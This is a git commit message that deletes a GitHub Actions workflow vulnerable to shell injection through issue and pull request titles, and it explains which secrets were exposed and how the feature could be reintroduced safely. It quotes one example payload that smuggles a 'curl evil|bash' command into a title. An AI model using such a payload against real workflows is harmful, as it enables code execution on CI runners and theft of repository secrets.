security: remove vulnerable create_pylon_issue.yml workflow (#2207)

This workflow interpolates `${{ github.event.issue.title }}` and
`${{ github.event.pull_request.title }}` directly into `run:` shell
steps. The surrounding single quotes around the curl `--data` payload
do not protect against a quote-breakout in the title (e.g.
`foo'$(curl evil|bash)'bar`), giving any GitHub user code execution
on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY,
PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.

The trigger surface is broad: `issues: opened` lets any user trigger
it by opening an issue, and `pull_request_target: opened` runs in the
base-repo context with access to base secrets against fork-controlled
input.

Removing entirely for now; the auto-create-Pylon-ticket behavior can
be reintroduced later with env-var indirection for user-controlled
fields and an author_association gate.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Author: haritamar